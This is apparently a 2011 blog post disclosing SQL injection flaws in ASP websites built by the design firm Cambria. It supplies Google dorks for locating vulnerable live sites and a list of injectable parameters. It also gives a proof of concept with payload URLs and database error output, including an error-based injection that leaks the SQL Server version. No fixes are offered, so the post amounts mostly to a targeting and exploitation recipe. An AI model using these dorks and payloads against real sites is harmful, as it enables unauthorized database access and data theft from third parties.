Thursday, August 4, 2011

Cambria Web Design Vulnerable to Multiple SQL Injection


Title : Cambria Web Design Vulnerable to Multiple SQL Injection
Vendor : http://www.cambria.com
Dork : intext:"Web Design by Cambria" filetype:asp
Dork2 : intext:"Custom software and Web Design by Cambria"
Category: WebApps


http://localhost.com/product_page.asp?ProductID=[SQL]&ProductCatID=[SQL]
http://localhost.com/pagecontent.asp?page=[SQL]
http://localhost.com/product_page.asp?Search=[SQL]
http://localhost.com/articles.asp?ArticleID=[SQL]


There are more parameters need to be checked.

~//POC//~

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/product_page_detail.asp, line 78

-------------------------------------------------------------------------------------
http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/product_page_detail.asp, line 78
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- p0pc0rn -
Share:

0 comments: